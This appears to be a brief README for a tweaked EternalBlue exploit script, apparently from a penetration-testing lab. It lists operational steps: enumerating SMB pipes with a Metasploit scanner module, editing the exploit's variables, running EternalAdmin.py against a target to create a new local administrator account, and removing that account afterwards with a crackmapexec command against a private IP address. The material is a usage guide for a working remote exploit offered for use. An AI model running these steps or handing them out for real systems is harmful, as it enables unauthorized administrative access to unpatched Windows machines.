Eternal blue exploit tweaked from https://www.exploit-db.com/exploits/42315
- Enumerate pipes
msfconsole
auxiliary/scanner/smb/pipe_auditor
-
Edit the 4 blank variables at the beginning of the exploit code
-
Run to a add new local admin account
python2.7 ./EternalAdmin.py [target] [pipe]
- Remove created local admin once finished
crackmapexec smb 192.168.4.29 -u 'z' -p 'x' --local-auth -x "net user /delete z"